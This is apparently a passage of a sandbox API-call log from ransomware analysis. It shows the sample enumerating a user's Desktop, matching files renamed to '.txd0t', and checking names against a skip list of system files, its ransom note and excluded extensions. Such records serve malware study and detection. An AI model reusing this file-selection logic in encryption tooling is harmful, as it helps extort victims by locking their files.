lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c9bb00, ftCreationTime.dwHighDateTime=0x1d5e7c6, ftLastAccessTime.dwLowDateTime=0xadea1ed0, ftLastAccessTime.dwHighDateTime=0x1d5eee9, ftLastWriteTime.dwLowDateTime=0x5076cdac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcd5f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CyLY.bmp.txd0t", cAlternateFileName="CYLYBM~1.TXD")) returned 1 [0119.300] StrCmpW (psz1="CyLY.bmp.txd0t", psz2=".") returned 1 [0119.300] StrCmpW (psz1="CyLY.bmp.txd0t", psz2="..") returned 1 [0119.300] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.300] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.300] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="CyLY.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t" [0119.300] PathFindExtensionW (pszPath="CyLY.bmp.txd0t") returned=".txd0t" [0119.300] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.300] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e49bf0, ftCreationTime.dwHighDateTime=0x1d5e5d9, ftLastAccessTime.dwLowDateTime=0xff29c150, ftLastAccessTime.dwHighDateTime=0x1d5e1e3, ftLastWriteTime.dwLowDateTime=0x50792fe4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x49e2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DE3scvajpXnclcE34.xls.txd0t", cAlternateFileName="DE3SCV~1.TXD")) returned 1 [0119.300] StrCmpW (psz1="DE3scvajpXnclcE34.xls.txd0t", psz2=".") returned 1 [0119.300] StrCmpW (psz1="DE3scvajpXnclcE34.xls.txd0t", psz2="..") returned 1 [0119.300] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.300] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.300] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="DE3scvajpXnclcE34.xls.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t" [0119.300] PathFindExtensionW (pszPath="DE3scvajpXnclcE34.xls.txd0t") returned=".txd0t" [0119.301] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.301] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.301] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.301] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.301] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e2a550, ftCreationTime.dwHighDateTime=0x1d5eca3, ftLastAccessTime.dwLowDateTime=0xc61bbc60, ftLastAccessTime.dwHighDateTime=0x1d5e828, ftLastWriteTime.dwLowDateTime=0x50792fe4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="GHZr_0qE96Rjj.avi.txd0t", cAlternateFileName="GHZR_0~1.TXD")) returned 1 [0119.301] StrCmpW (psz1="GHZr_0qE96Rjj.avi.txd0t", psz2=".") returned 1 [0119.301] StrCmpW (psz1="GHZr_0qE96Rjj.avi.txd0t", psz2="..") returned 1 [0119.301] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.301] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.301] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="GHZr_0qE96Rjj.avi.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t" [0119.301] PathFindExtensionW (pszPath="GHZr_0qE96Rjj.avi.txd0t") returned=".txd0t" [0119.301] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.301] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d77c440, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x28888e60, ftLastAccessTime.dwHighDateTime=0x1d5e8aa, ftLastWriteTime.dwLowDateTime=0x507b93c9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xc217, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="jhscRm6vvE.csv.txd0t", cAlternateFileName="JHSCRM~1.TXD")) returned 1 [0119.301] StrCmpW (psz1="jhscRm6vvE.csv.txd0t", psz2=".") returned 1 [0119.301] StrCmpW (psz1="jhscRm6vvE.csv.txd0t", psz2="..") returned 1 [0119.301] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.301] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.301] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="jhscRm6vvE.csv.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t" [0119.301] PathFindExtensionW (pszPath="jhscRm6vvE.csv.txd0t") returned=".txd0t" [0119.301] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.301] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2255f40, ftCreationTime.dwHighDateTime=0x1d5ed83, ftLastAccessTime.dwLowDateTime=0x5f6fb860, ftLastAccessTime.dwHighDateTime=0x1d5f01e, ftLastWriteTime.dwLowDateTime=0x507df3de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1727a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="K7u1HHJ_-wyjZGJCddO.doc.txd0t", cAlternateFileName="K7U1HH~1.TXD")) returned 1 [0119.301] StrCmpW (psz1="K7u1HHJ_-wyjZGJCddO.doc.txd0t", psz2=".") returned 1 [0119.301] StrCmpW (psz1="K7u1HHJ_-wyjZGJCddO.doc.txd0t", psz2="..") returned 1 [0119.301] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.301] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.301] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="K7u1HHJ_-wyjZGJCddO.doc.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t" [0119.301] PathFindExtensionW (pszPath="K7u1HHJ_-wyjZGJCddO.doc.txd0t") returned=".txd0t" [0119.301] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.301] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa575a7d0, ftCreationTime.dwHighDateTime=0x1d5e5aa, ftLastAccessTime.dwLowDateTime=0x34fdb140, ftLastAccessTime.dwHighDateTime=0x1d5ecb3, ftLastWriteTime.dwLowDateTime=0x507df3de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa51c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="lDvQFP7B58nzHOr.m4a.txd0t", cAlternateFileName="LDVQFP~1.TXD")) returned 1 [0119.301] StrCmpW (psz1="lDvQFP7B58nzHOr.m4a.txd0t", psz2=".") returned 1 [0119.301] StrCmpW (psz1="lDvQFP7B58nzHOr.m4a.txd0t", psz2="..") returned 1 [0119.301] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.302] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.302] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="lDvQFP7B58nzHOr.m4a.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t" [0119.302] PathFindExtensionW (pszPath="lDvQFP7B58nzHOr.m4a.txd0t") returned=".txd0t" [0119.302] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.302] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2419ea80, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x2419ea80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x22502700, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x27000, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mspusf.exe", cAlternateFileName="")) returned 1 [0119.302] StrCmpW (psz1="mspusf.exe", psz2=".") returned 1 [0119.302] StrCmpW (psz1="mspusf.exe", psz2="..") returned 1 [0119.302] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.302] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.302] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="mspusf.exe", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe") returned="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe" [0119.302] PathFindExtensionW (pszPath="mspusf.exe") returned=".exe" [0119.302] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="bootsect.bak") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="iconcache.db") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="thumbs.db") returned -1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2=" ransomware ") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2=" ransom ") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="debug.txt") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="boot.ini") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="desktop.ini") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="autorun.inf") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="ntuser.dat") returned -1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="ntldr") returned -1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="ntdetect.com") returned -1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="bootfont.bin") returned 1 [0119.302] StrCmpIW (psz1="mspusf.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0119.302] PathFindExtensionW (pszPath="mspusf.exe") returned=".exe" [0119.302] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0119.302] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0152430, ftCreationTime.dwHighDateTime=0x1d5edf5, ftLastAccessTime.dwLowDateTime=0xc2c01df0, ftLastAccessTime.dwHighDateTime=0x1d5f02e, ftLastWriteTime.dwLowDateTime=0x50a8df2a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14166, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OifmxvKJj07hQoi0y.ppt.txd0t", cAlternateFileName="OIFMXV~1.TXD")) returned 1 [0119.302] StrCmpW (psz1="OifmxvKJj07hQoi0y.ppt.txd0t", psz2=".") returned 1 [0119.302] StrCmpW (psz1="OifmxvKJj07hQoi0y.ppt.txd0t", psz2="..") returned 1 [0119.303] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.303] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.303] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="OifmxvKJj07hQoi0y.ppt.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t" [0119.303] PathFindExtensionW (pszPath="OifmxvKJj07hQoi0y.ppt.txd0t") returned=".txd0t" [0119.303] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.303] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b5ea80, ftCreationTime.dwHighDateTime=0x1d5e858, ftLastAccessTime.dwLowDateTime=0x79ba9ae0, ftLastAccessTime.dwHighDateTime=0x1d5efb1, ftLastWriteTime.dwLowDateTime=0x508059ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16085, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="oIyEk1tbor7X9s.bmp.txd0t", cAlternateFileName="OIYEK1~1.TXD")) returned 1 [0119.303] StrCmpW (psz1="oIyEk1tbor7X9s.bmp.txd0t", psz2=".") returned 1 [0119.303] StrCmpW (psz1="oIyEk1tbor7X9s.bmp.txd0t", psz2="..") returned 1 [0119.303] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.303] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.303] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="oIyEk1tbor7X9s.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t" [0119.303] PathFindExtensionW (pszPath="oIyEk1tbor7X9s.bmp.txd0t") returned=".txd0t" [0119.303] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.303] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf7020, ftCreationTime.dwHighDateTime=0x1d5f060, ftLastAccessTime.dwLowDateTime=0xb76abe30, ftLastAccessTime.dwHighDateTime=0x1d5ee2e, ftLastWriteTime.dwLowDateTime=0x5082b988, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaef5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OO_s81.avi.txd0t", cAlternateFileName="OO_S81~1.TXD")) returned 1 [0119.303] StrCmpW (psz1="OO_s81.avi.txd0t", psz2=".") returned 1 [0119.303] StrCmpW (psz1="OO_s81.avi.txd0t", psz2="..") returned 1 [0119.303] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.303] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.303] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="OO_s81.avi.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t" [0119.303] PathFindExtensionW (pszPath="OO_s81.avi.txd0t") returned=".txd0t" [0119.303] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.303] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c778d70, ftCreationTime.dwHighDateTime=0x1d5e836, ftLastAccessTime.dwLowDateTime=0x91a2deb0, ftLastAccessTime.dwHighDateTime=0x1d5ee67, ftLastWriteTime.dwLowDateTime=0x5082b988, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xea8a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PYzrJzKfYy0WH.jpg.txd0t", cAlternateFileName="PYZRJZ~1.TXD")) returned 1 [0119.303] StrCmpW (psz1="PYzrJzKfYy0WH.jpg.txd0t", psz2=".") returned 1 [0119.303] StrCmpW (psz1="PYzrJzKfYy0WH.jpg.txd0t", psz2="..") returned 1 [0119.303] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.307] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.307] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="PYzrJzKfYy0WH.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t" [0119.307] PathFindExtensionW (pszPath="PYzrJzKfYy0WH.jpg.txd0t") returned=".txd0t" [0119.307] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.307] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d5de10, ftCreationTime.dwHighDateTime=0x1d5eecd, ftLastAccessTime.dwLowDateTime=0x46bf2c70, ftLastAccessTime.dwHighDateTime=0x1d5e7ad, ftLastWriteTime.dwLowDateTime=0x509cf504, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7a3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="rBWrlFNmCY.bmp.txd0t", cAlternateFileName="RBWRLF~1.TXD")) returned 1 [0119.307] StrCmpW (psz1="rBWrlFNmCY.bmp.txd0t", psz2=".") returned 1 [0119.307] StrCmpW (psz1="rBWrlFNmCY.bmp.txd0t", psz2="..") returned 1 [0119.307] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.307] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.307] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="rBWrlFNmCY.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t" [0119.307] PathFindExtensionW (pszPath="rBWrlFNmCY.bmp.txd0t") returned=".txd0t" [0119.307] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.307] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37d9fe90, ftCreationTime.dwHighDateTime=0x1d5e7c3, ftLastAccessTime.dwLowDateTime=0xf24c1b0, ftLastAccessTime.dwHighDateTime=0x1d5efd4, ftLastWriteTime.dwLowDateTime=0x50a8df2a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x171ce, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="RnjQ5ZSPpYJwR3B.jpg.txd0t", cAlternateFileName="RNJQ5Z~1.TXD")) returned 1 [0119.307] StrCmpW (psz1="RnjQ5ZSPpYJwR3B.jpg.txd0t", psz2=".") returned 1 [0119.307] StrCmpW (psz1="RnjQ5ZSPpYJwR3B.jpg.txd0t", psz2="..") returned 1 [0119.308] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="RnjQ5ZSPpYJwR3B.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t" [0119.308] PathFindExtensionW (pszPath="RnjQ5ZSPpYJwR3B.jpg.txd0t") returned=".txd0t" [0119.308] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.308] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3379b30, ftCreationTime.dwHighDateTime=0x1d5eeaa, ftLastAccessTime.dwLowDateTime=0x23f0b1e0, ftLastAccessTime.dwHighDateTime=0x1d5e277, ftLastWriteTime.dwLowDateTime=0x50b022e0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x44c0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="RwNhKXau 7hWtmS6.png.txd0t", cAlternateFileName="RWNHKX~1.TXD")) returned 1 [0119.308] StrCmpW (psz1="RwNhKXau 7hWtmS6.png.txd0t", psz2=".") returned 1 [0119.308] StrCmpW (psz1="RwNhKXau 7hWtmS6.png.txd0t", psz2="..") returned 1 [0119.308] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="RwNhKXau 7hWtmS6.png.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t" [0119.308] PathFindExtensionW (pszPath="RwNhKXau 7hWtmS6.png.txd0t") returned=".txd0t" [0119.308] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.308] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeff63820, ftCreationTime.dwHighDateTime=0x1d5e374, ftLastAccessTime.dwLowDateTime=0xff2484f0, ftLastAccessTime.dwHighDateTime=0x1d5ea59, ftLastWriteTime.dwLowDateTime=0x50e9405f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10996, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="s2-ewyNmBK.gif.txd0t", cAlternateFileName="S2-EWY~1.TXD")) returned 1 [0119.308] StrCmpW (psz1="s2-ewyNmBK.gif.txd0t", psz2=".") returned 1 [0119.308] StrCmpW (psz1="s2-ewyNmBK.gif.txd0t", psz2="..") returned 1 [0119.308] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="s2-ewyNmBK.gif.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t" [0119.308] PathFindExtensionW (pszPath="s2-ewyNmBK.gif.txd0t") returned=".txd0t" [0119.308] 